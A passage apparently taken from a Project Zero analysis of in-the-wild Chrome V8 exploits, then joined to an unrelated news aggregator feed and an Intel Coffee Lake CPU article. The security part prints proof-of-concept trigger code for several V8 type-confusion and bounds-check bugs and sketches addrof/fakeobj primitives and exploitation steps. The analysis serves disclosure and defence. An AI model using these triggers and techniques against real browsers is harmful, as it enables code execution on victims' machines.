The issue was reported to Chrome by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. The fix made the alias analyzer use the constant comparison only when both arguments are constants:
HAliasing Query(HValue* a, HValue* b) {
  [...]
  // Constant objects can be distinguished statically.
-  if (a->IsConstant()) {
+  if (a->IsConstant() && b->IsConstant()) {
    return a->Equals(b) ? kMustAlias : kNoAlias;
  }
  return kMayAlias;
The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.
The author of the exploit takes a known approach to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.
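The general shape of these primitives is well known; the following sketch (ours, not the actor's code) shows the idea. In a real exploit, the two views below would alias the same array slot through the type confusion; here they are separate placeholders.

var tagged_slot = [{}];                 // element tracked as a tagged pointer
var double_slot = new Float64Array(1);  // the same memory viewed as a raw double

function addrof(obj) {
  tagged_slot[0] = obj;   // store the object as a tagged pointer
  return double_slot[0];  // read the pointer bits back as a double
}

function fakeobj(addr) {
  double_slot[0] = addr;  // write attacker-controlled pointer bits
  return tagged_slot[0];  // read them back as an object reference
}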
The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.
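A sketch of the regeneration idea (hypothetical code reusing the global_array trigger shown earlier; the real exploit builds considerably more machinery): since the confusion fires only once per JIT-compiled function, each use compiles a fresh copy of the trigger via eval.

var trigger_id = 0;
function makeTrigger() {
  // Each generated function gets its own feedback and JIT code, so the
  // map-check elimination can be triggered again from scratch.
  return eval('(function trigger_' + trigger_id++ + '(local_array) {' +
              '  var temp = global_array[0];' +
              '  local_array[1] = {};' +
              '  return global_array[1];' +
              '})');
}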
The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.
However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.
The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.
The general approach is similar; however, the new exploit seems to have been rewritten from scratch with simplicity and conciseness in mind, as it’s only half the size of the previous one. addrof is implemented in a way that allows leaking pointers to three objects at a time and is only used once, so the dynamic generation of trigger functions is no longer needed. The exploit employs mutable on-heap typed arrays instead of JS strings to store the contents of fake objects; therefore, an extra level of indirection in the form of an additional ArrayBuffer is not required. Another notable change is the use of a RegExp object for code execution. The possible benefit here is that, unlike a JS function, which needs to be called many times to get JIT-compiled, a regular expression gets translated into native code already in the constructor.
While it’s possible that the exploits were written after the issue had become public, they greatly differ from the public exploit in both the design and implementation details. The attacker has thoroughly investigated the issue, for example, their trigger function is much more straightforward than in the public proof-of-concept.
This is a side effect modelling issue in TurboFan. The function InferReceiverMapsUnsafe assumes that a JSCreate node can only modify the map of its value output. However, in reality, the node can trigger a property access on the new_target parameter, which is observable to user JavaScript if new_target is a proxy object. Therefore, the attacker can unexpectedly change, for example, the element representation of a JS array and trigger a type confusion similar to the one discussed above:
'use strict';
(function() {
  var popped;

  function trigger(new_target) {
    function inner(new_target) {
      function constructor() {
        popped = Array.prototype.pop.call(array);
      }
      var temp = array[0];
      return Reflect.construct(constructor, arguments, new_target);
    }

    inner(new_target);
  }

  var array = new Array(0, 0, 0, 0, 0);

  for (var i = 0; i < 20000; i++) {
    trigger(function() { });
    array.push(0);
  }

  var proxy = new Proxy(Object, {
    get: () => (array[4] = 1.1, Object.prototype)
  });

  trigger(proxy);
  print(popped);
}());
A call reducer (i.e., an optimizer) for Array.prototype.pop invokes InferReceiverMapsUnsafe, which marks the inference result as reliable, meaning that it doesn’t require a runtime check. When the proxy object is passed to the vulnerable function, it triggers the tagged -> double element transition. Then pop takes a double element and interprets it as a tagged pointer value.
Note that the attacker can’t call the array function directly because for the expression array.pop() the compiler would insert an extra map check for the property read, which would be scheduled after the proxy handler had modified the array.
This is the only Chrome vulnerability that was still exploited as a 0-day at the time we discovered the exploit server. The issue was reported to Chrome under the 7-day deadline. The one-line patch modified the vulnerable function to mark the result of the map inference as unreliable whenever it encounters a JSCreate node:
InferReceiverMapsResult NodeProperties::InferReceiverMapsUnsafe(
  [...]
  InferReceiverMapsResult result = kReliableReceiverMaps;
  [...]
    case IrOpcode::kJSCreate: {
      if (IsSame(receiver, effect)) {
        base::Optional<MapRef> initial_map = GetJSCreateMap(broker, receiver);
        if (initial_map.has_value()) {
          *maps_return = ZoneHandleSet<Map>(initial_map->object());
          return result;
        }
        // We reached the allocation of the {receiver}.
        return kNoReceiverMaps;
      }
+     result = kUnreliableReceiverMaps;  // JSCreate can have side-effect.
      break;
    }
  [...]
The reader can refer to the blog post published by Exodus Intel for more details on the issue and their version of the exploit.
This time there’s no embedded list of supported browser versions; the appropriate constants for Chrome 60-63 are determined on the server side.
The exploit takes a rather exotic approach: it only implements a function for the confusion in the double -> tagged direction, i.e. the fakeobj primitive, and takes advantage of a side effect in pop to leak a pointer to the internal hole object. The function pop overwrites the “popped” value with the hole, but due to the same confusion it writes a pointer instead of the special bit pattern for double arrays.
The exploit uses the leaked pointer and fakeobj to implement a data leak primitive that can “survive” garbage collection. First, it acquires references to two other internal objects, the class_start_position and class_end_position private symbols, owing to the fact that the offset between them and the hole is fixed. Private symbols are special identifiers used by V8 to store hidden properties inside regular JS objects. In particular, the two symbols refer to the start and end substring indices in the script source that represent the body of a class. When JSFunction::ToString is invoked on the class constructor and builds the substring, it performs no bounds checks on the “trustworthy” indices; therefore, the attacker can modify them to leak arbitrary chunks of data in the V8 heap.
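To illustrate the flow (a hypothetical sketch, not the actor's code): once the indices stored under the private symbols are replaced, a plain toString call becomes an arbitrary heap read.

class Leaky {
  constructor() { /* the class body delimits the start/end positions */ }
}

// ...overwrite Leaky's class_start_position and class_end_position values
// with attacker-chosen indices via the fakeobj-based primitives...

var leaked = Leaky.toString();  // the substring is built without bounds checks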
The obtained data is scanned for values required to craft a fake typed array: maps, fixed arrays, backing store pointers, etc. This approach allows the attacker to construct a perfectly valid fake object. Since the object is located in a memory region outside the V8 heap, the exploit also has to create a fake MemoryChunk header and marking bitmap to force the garbage collector to skip the crafted objects and, thus, avoid crashes.
Finally, the exploit overwrites the code of a JIT-compiled function with a payload and executes it.
The author has implemented extensive sanity checking. For example, the data leak primitive is reused to verify that the garbage collector hasn’t moved critical objects. In case of a failure, the worker with the exploit gets terminated before it can cause a crash. Quite impressively, even when we manually put GC invocations into critical sections of the exploit, it was still able to exit gracefully most of the time.
The exploit employs an interesting technique to detect whether the trigger function has been JIT-compiled:
jit_detector[Symbol.toPrimitive] = function() {
  var stack = (new Error).stack;
  if (stack.indexOf("Number (") == -1) {
    jit_detector.is_compiled = true;
  }
};

function trigger(array, proxy) {
  if (!jit_detector.is_compiled) {
    Number(jit_detector);
  }
  [...]
During compilation, TurboFan inlines the builtin function Number. This change is reflected in the JS call stack. Therefore, the attacker can scan a stack trace from inside a function that Number invokes to determine the compilation state.
The exploit was broken in Chrome 64 by the change that encapsulated both class body indices in a single internal object. Although the change only affected a minor detail of the exploit and had an obvious workaround, which is discussed below, the actor decided to abandon this 0-day and switch to an exploit for CVE-2019-5782. This observation suggests that the attacker was already aware of the third vulnerability around the time Chrome 64 came out, i.e. it was also used as a 0-day.
After CVE-2019-5782 became unexploitable, the actor returned to this vulnerability. However, in the meantime, another commit landed in Chrome that stopped TurboFan from trying to optimize builtins invoked via Function.prototype.call or similar functions. Therefore, the trigger function had to be updated:
function trigger(new_target) {
  function inner(new_target) {
    popped = array.pop(
        Reflect.construct(function() { }, arguments, new_target));
  }

  inner(new_target);
}
By making the result of Reflect.construct an argument to the pop call, the attacker can move the corresponding JSCreate node after the map check induced by the property load.
The new exploit also has a modified data leak primitive. First, the attacker no longer relies on the side effect in pop to get an address on the heap and reuses the type confusion to implement the addrof function. Because the exploit doesn’t have a reference to the hole, it obtains the address of the builtin asyncIterator symbol instead, which is accessible to user scripts and also stored next to the desired class_positions private symbol.
The exploit can’t modify the class body indices directly as they’re not regular properties of the object referenced by class_positions. However, it can replace the entire object, so it generates an extra class with a much longer constructor string and uses it as a donor.
This version targets Chrome 68-72. It was broken by the commit that enabled the W^X protection for JIT regions. Again, given that there are still similar RWX mappings in the renderer related to WebAssembly, the exploit could have been easily fixed. The attacker, nevertheless, decided to focus on an exploit for CVE-2019-13764 instead.
The actor returned once again to this vulnerability after CVE-2019-13764 got fixed. The new exploit bypasses the W^X protection by replacing a JIT-compiled JS function with a WebAssembly function as the overwrite target for code execution. That’s the only significant change made by the author.
Exploit 3 is the only one we’ve discovered on the Windows server, and Exploit 4 is essentially the same exploit adapted for Android. Interestingly, it only appeared on the Android server after the fix for the vulnerability came out. A significant amount of number and string literals got updated, and the pop call in the trigger function was replaced with a shift call. The actor likely attempted to avoid signature-based detection with those changes.
The exploits were used against Chrome 78-79 on Windows and 78-80 on Android until the vulnerability finally got patched.
The public exploit presented by Exodus Intel takes a completely different approach and abuses the fact that double and tagged pointer elements differ in size. When the same bug is applied against the function Array.prototype.push, the backing store offset for the new element is calculated incorrectly and, therefore, arbitrary data gets written past the end of the array. In this case the attacker doesn’t have to craft fake objects to achieve arbitrary read/write, which greatly simplifies the exploit. However, on 64-bit systems, this approach can only be used starting from Chrome 80, i.e. the version that introduced the pointer compression feature. While Chrome still runs in the 32-bit mode on Android in order to reduce memory overhead, user agent checks found in the exploits indicate that the actor also targeted (possibly 64-bit) webview processes.
CVE-2019-5782 is an issue in TurboFan’s typer module. During compilation, the typer infers the possible type of every node in a function graph using a set of rules imposed by the language. Subsequent optimization passes rely on this information and can, for example, eliminate a security-critical check when the predicted type suggests the check would be redundant. A mismatch between the inferred type and actual value can, therefore, lead to security issues.
Note that in this context, the notion of type is quite different from, for example, C++ types. A TurboFan type can be represented by a range of numbers or even a specific value. For more information on typer bugs please refer to the previous post.
In this case an incorrect type is produced for the expression arguments.length, i.e. the number of arguments passed to a given function. The compiler assigns it the integer range [0; 65534], which is valid for a regular call; however, the same limit is not enforced for Function.prototype.apply. The mismatch was abused by the attacker to eliminate a bounds check and access data past the end of the array:
oob_index = 100000;

function trigger() {
  let array = [1.1, 1.1];

  let index = arguments.length;
  index = index - 65534;
  index = Math.max(index, 0);

  return array[index] = 2.2;
}

for (let i = 0; i < 20000; i++) {
  trigger(1, 2, 3);
}

print(trigger.apply(null, new Array(65534 + oob_index)));
Qixun Zhao used the same vulnerability at Tianfu Cup and reported it to Chrome in November 2018. The public report includes a renderer exploit. The fix, which landed in Chrome 72, simply relaxed the range of the length property.
The discovered exploit targets Chrome 63-67. The exploit flow is a bit unconventional as it doesn’t rely on typed arrays to gain arbitrary read/write. The attacker makes use of the fact that V8 allocates objects in the new space linearly to precompute inter-object offsets. The vulnerability is only triggered once to corrupt the length property of a tagged pointer array. The corrupted array can then be used repeatedly to overwrite the elements field of an unboxed double array with an arbitrary JS object, which gives the attacker raw access to the contents of that object. It’s worth noting that this approach doesn’t even require performing manual pointer arithmetic. As usual, the exploit finishes by overwriting the code of a JS function with the payload.
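A rough sketch of the layout idea (hypothetical values, not the actor's code): because new-space allocations are linear, two arrays allocated back to back sit at a predictable offset from each other.

var tagged = [{}, {}, {}];      // the length of this array gets corrupted once
var doubles = [1.1, 2.2, 3.3];  // allocated immediately after in the new space

// An out-of-bounds write through `tagged` can now replace the elements
// pointer of `doubles` with an arbitrary JS object, exposing the raw
// contents of that object as doubles.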
Interestingly, this is the only exploit that doesn’t take advantage of running inside a web worker even though the vulnerability is fully compatible. Also, the amount of error checking is significantly smaller than in the previous exploits. The author probably assumed that the exploitation primitive provided by the issue was so reliable that all additional safety measures became unnecessary. Nevertheless, during our testing, we did occasionally encounter crashes when one of the allocations that the exploit makes managed to trigger garbage collection. That said, such crashes were indeed quite rare.
As the reader may have noticed, the exploit had stopped working long before the issue was fixed. The reason is that one of the hardening patches against speculative side-channel attacks in V8 broke the bounds check elimination technique used by the exploit. The protection was soon turned off for desktop platforms and replaced with site isolation; hence, the public exploit, which employs the same technique, was successfully used against Chrome 70 on Windows during the competition.
The public and private exploits have little in common apart from the bug itself and the BCE technique, which has been commonly known since at least 2017. The public exploit turns the out-of-bounds access into a type confusion and then follows the older approach, which involves crafting a fake array buffer object, to achieve code execution.
This more complex typer issue occurs when TurboFan doesn’t reflect the possible NaN value in the type of an induction variable. The bug can be triggered by the following code:
for (var i = -Infinity; i < 0; i += Infinity) {
  [...]
}
This vulnerability and exploit for Chrome 73-79 have been discussed in detail in the previous blog post. There’s also an earlier version of the exploit targeting Chrome 69-72; the only difference is that the newer version switched from a JS JIT function to a WASM function as the overwrite target.
The comparison with the exploit for the previous typer issue (CVE-2019-5782) is more interesting, though. The developer put much greater emphasis on stability of the new exploit even though the two vulnerabilities are identical in this regard. The web worker wrapper is back, and the exploit doesn’t corrupt tagged element arrays to avoid GC crashes. Also, it no longer relies completely on precomputed offsets between objects in the new space. For example, to leak a pointer to a JS object the attacker puts it between marker values and then scans the memory for the matching pattern. Finally, the number of sanity checks is increased again.
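For instance, the pointer leak could look roughly like this (marker values hypothetical): the target object is placed between recognizable small-integer markers, and the exploit then scans the leaked memory for that pattern instead of relying on a fixed offset.

var target = {};
var container = [0x41414141, target, 0x42424242];

// Scan the out-of-bounds leaked words for the tagged representations of
// the two markers; the word found between them is the pointer to `target`.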
It’s also worth noting that the new typer bug exploitation technique worked against Chrome on Android despite the side-channel attack mitigation and could have “revived” the exploit for CVE-2019-5782.
The timeline data and incremental changes between different exploit versions suggest that at least three out of the four vulnerabilities (CVE-2020-6418, CVE-2019-5782 and CVE-2019-13764) have been used as 0-days.
It is no secret that exploit reliability is a priority for high-tier attackers, but our findings demonstrate the amount of resources the attackers are willing to spend on making their exploits extra reliable, especially the evidence that the actor twice switched from an already high-quality 0-day to a slightly better vulnerability.
The area of JIT engine security has received great attention from the wider security community over the last few years. In 2014, when Chrome 37 came out, the exploit for CVE-2017-5070 would be considered quite ahead of its time. In contrast, if we don’t take into account the stability aspect, the exploit for the latest typer issue is not very different from exploits that enthusiasts made for JavaScript challenges at CTF competitions in 2019. This attention also likely affects the average lifetime of a JIT vulnerability and, therefore, may force attackers to move to different bug classes in the future.
This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 4: Android Exploits.
Published: 2020-08-01 01:04:41
Popularity: None
Author: Ryan Hughes
A Tampa teenager is in jail, accused of being the “mastermind” behind a hack on the social media website Twitter that caused limited access to the site and high-profile accounts, accord…
...morePublished: 2019-03-07 23:23:54
Popularity: None
Author: Posted by Ryan Hurst and Gary Belvin, Security and Privacy Engineering
Posted by Ryan Hurst and Gary Belvin, Security and Privacy Engineering Encryption is a foundational technology for the web. We’ve spent a l...
...morePublished: 2019-03-07 23:01:44
Popularity: None
Author: Posted by Oliver Chang, Abhishek Arya (Security Engineers, Chrome Security), Kostya Serebryany (Software Engineer, Dynamic Tools), and Josh Armour (Security Program Manager)
Posted by Oliver Chang, Abhishek Arya (Security Engineers, Chrome Security), Kostya Serebryany (Software Engineer, Dynamic Tools), and Josh ...
...morePublished: 2019-03-07 22:49:45
Popularity: None
Author: Brett Howse, Ryan Smith
In an unusual set of circumstances (ed: someone couldn't follow a simple embargo), this evening Intel is officially announcing its 8th Generation desktop CPU lineup, codenamed Coffee Lake. This comes roughly a week and a half ahead of its originally planned launch date (and still the shipping date) of October 5th. We’ve already seen part of the 8th Generation announced – the "Kaby Lake Refresh" based mobile parts – which included a bump in core counts for some of the formerly dual-core U-series processors, upgrading them to quad-core processors with HyperThreading. Meanwhile on the desktop side, there’s been some news that’s already found its way out, and as usual, some rumors as well. But tonight, Intel is finally and officially taking the wraps off of their latest lineup of desktop CPUs, along with the associated Z370 chipset.
Although there are a lot of new enhancements coming to the party, arguably the biggest one for most people is that Intel has finally expanded the core counts across the range, which is something they’ve not done on non-HEDT systems since they originally went to quad-cores with the Core 2 Extreme QX6700, way back in 2006. If you wanted more Intel cores than four prior to now, you’d have to move to HEDT, but no longer. Core i7 is moving to six cores with HyperThreading, Core i5 is moving to six cores, and Core i3 is moving to four cores.
Basic Specifications of Intel Core i3/i5/i7 Desktop CPUs

7th Generation                                            | 8th Generation
CPU             | Cores | Base   | Boost  | L3   | TDP    | CPU             | Cores | Base   | Boost  | L3    | TDP
i7-7700K ($339) | 4/8   | 4.2GHz | 4.5GHz | 8 MB | 91W    | i7-8700K ($359) | 6/12  | 3.7GHz | 4.7GHz | 12 MB | 95W
i7-7700 ($303)  | 4/8   | 3.6GHz | 4.2GHz | 8 MB | 65W    | i7-8700 ($303)  | 6/12  | 3.2GHz | 4.6GHz | 12 MB | 65W
i5-7600K ($242) | 4/4   | 3.8GHz | 4.2GHz | 6 MB | 91W    | i5-8600K ($257) | 6/6   | 3.6GHz | 4.3GHz | 9 MB  | 95W
i5-7400 ($182)  | 4/4   | 3.0GHz | 3.5GHz | 6 MB | 65W    | i5-8400 ($182)  | 6/6   | 2.8GHz | 4.0GHz | 9 MB  | 65W
i3-7350K ($168) | 2/4   | 4.2GHz | N/A    | 4 MB | 60W    | i3-8350K ($168) | 4/4   | 4.0GHz | N/A    | 8 MB  | 91W
i3-7100 ($117)  | 2/4   | 3.9GHz | N/A    | 3 MB | 51W    | i3-8100 ($117)  | 4/4   | 3.6GHz | N/A    | 6 MB  | 65W
If you’ve got workloads that can handle more threads, the latest Coffee Lake parts should provide a significant boost in performance. We’ll have to wait for the full review to see how much of an increase this provides, but Intel is saying up to 25% more FPS and 45% better performance when “mega-tasking” compared to the Core i7-7700K. Those are fairly bold claims, so we’ll have to see how they make out, but it would not be out of the realm of possibility, especially on the “mega-tasking” where Intel is talking about gaming, plus streaming, plus recording of PlayerUnknown’s Battlegrounds, compared to the quad-core i7-7700K.
Nothing comes for free, of course, and the extra cores on the i7-8700K do push the base frequency down 500 MHz from the Kaby Lake i7-7700K, although the boost frequency is 200 MHz higher. The latter is particularly interesting, as Intel isn't using "favored cores" ala Turbo Boost Max 3.0 here. Instead, these are typical Turbo Boost 2.0 frequencies, which is to say that each and every core needs to be capable of hitting these published clockspeeds. Or put another way, if you throw TDP limits into the wind, turning on a motherboard's multi-core enhancement (or equivalent) should get you a true 4.7GHz 6-core CPU without any real overclocking. Similarly, I strongly suspect that the lower base clock is for TDP reasons, as Intel has only increased the official TDPs from 91W for the high-end 7th Gen CPUs to 95W for the 8th Gen CPUs.
Suffice it to say then, Intel is aiming for high performance levels here. This isn't something that's going to touch Intel's HEDT Skylake-X family of CPUs in heavily multi-threaded workloads simply by virtue of lower TDPs and fewer cores – though the i7-7800X has just become redundant – but instead the new hex core models in particular are going to offer Intel's fastest single-threaded performance to date, coupled with an increased number of cores. So high-end buyers will find themselves picking between fast Coffee Lake hexes, somewhat lower ST performance Skylake-X processors with 8+ cores, and of course AMD's Ryzen lineup, which has lower ST performance still, but at the high-end offers 8 to 16 Zen cores.
The downside for Intel mainstream CPU users through all of this is that prices are going up on Intel's high performance K model CPUs. Whereas the list price for a 7700K was $339, it's $359 for an 8700K, a $20 (6%) jump. Similarly, a top-end i5 has gone from $242 for the 7600K to $257 for the 8600K, a $15 (6%) price increase. And as always, keep in mind that these prices are per chip in a 1000 unit order; actual retail prices will be several percent higher still. So don't be surprised to see the 8700K closing in on $400 at retail.
Meanwhile, along with the new Coffee Lake CPUs, Intel is also announcing a new chipset to support said CPUs: Z370. Intel's specifications for motherboards require improved power delivery over the previous models, to support the higher demands of more cores. They also support DDR4-2666 memory officially now. Curiously, the slides from Intel show integrated Thunderbolt 3, which would make a lot of sense since Intel wants to promote their own standard; however the company was unable to let us know if any extra silicon would be required to enable Thunderbolt 3 beyond the chipset, as was the case with the Z270. Most likely it will be, as Thunderbolt's high speeds require transceivers/redrivers close to the ports. Intel did however clarify that HDMI 2.0a will still require an extra LSPCon (Level Shifter - Protocol Converter) in the DP 1.2 path.
Intel is also promoting its Optane Memory, which is the cache version of their Optane brand. This isn’t new, and we’ve even had a chance to try out Optane Memory earlier this year. The numbers Intel quotes though are compared to an older system with a mechanical hard drive, and while Optane Memory will certainly help out there, so will moving to SSDs for your storage.
Intel is also touting the overclocking capabilities of the latest processors, which feature per-core overclocking, and other enhancements to let the end-user squeeze the last ounce of performance out of their purchase. Personally, I’m not into overclocking, so I’ll leave this section to Ian for the review.
It's hard to imagine that Intel’s Coffee Lake is quite what the company wanted to offer when drawing up their plans a couple of years ago. But with increased competition, OEMs who prefer a regular cadence they can match their own product lineups to, and most importantly the well-publicized delays in getting their cutting-edge 10nm manufacturing process up to par, Intel has had to stick with 14nm again. However the upshot of this is that Coffee Lake is the first CPU family coming out of Intel built on their updated 14++ process, so while it remains to be seen just how good 14++ really is, under the hood Coffee Lake is going to be at least a little bit more than just a bump in the CPU core counts.
Speaking of cores, Intel has also confirmed that relative to Kaby Lake, Coffee Lake still retains the same CPU and GPU architectures; Intel isn't rolling out any new architectural designs here. This means we're talking about Skylake CPU cores coupled with Kaby Lake GPU cores, though with what I imagine will be higher clockspeeds on the latter as well. So while Coffee Lake won't completely upend Intel's CPU stack – and this is why Intel isn't committing a massive faux pas by mixing Kaby Lake Refresh with Coffee Lake under the 8th Gen banner – a 50-100% increase in cores is hard to be upset about. The increased performance, especially in multi-threaded workloads, should help Intel in the desktop space, which is the one space where they have actual competition right now.
Source: Intel
Published: 2019-03-07 22:48:40
Popularity: None
Author: Robert McMillan and Ryan Knutson
A massive data breach at Yahoo in 2013 was far more extensive than previously disclosed, affecting all of its 3 billion user accounts, its parent company Verizon said.
...morePublished: 2019-03-07 22:44:04
Popularity: None
Author: Bryan Lunduke
You might not know it, but inside your Intel system, you have an operating system running in addition to your main OS that is raising eyebrows and concerns. It's called MINIX.
...morePublished: 2019-03-07 22:35:34
Popularity: None
Author: Bryan Menegus
For the third time in recent months, big problems have been discovered with macOS High Sierra.
...morePublished: 2019-03-07 22:33:05
Popularity: None
Author: Bryan Menegus
A short-lived and relatively unknown cryptocurrency project built on Ethereum called Prodeum disappeared this weekend—along with the money a small number of hapless investors sunk into it. All that remained of its website was a white page with the word “penis” written on it.
...morePublished: 2019-03-07 22:08:58
Popularity: None
Author: Ryan Whitwam
For years, you've been able to connect to the Tor Network on Android using Orbot and browse using Orfox. Now, you can get the privacy and security...
...morePublished: 2024-09-05 18:41:02
Popularity: 21
Author: Ryan Naraine
Keywords:
A secretive Russian military unit, previously linked to assassinations and destabilization in Europe, is blamed for destructive wiper malware attacks in Ukraine. The post Russian GRU Unit Tied to Assassinations Linked to Global Cyber Sabotage and Espionage appeared first on SecurityWeek.
...more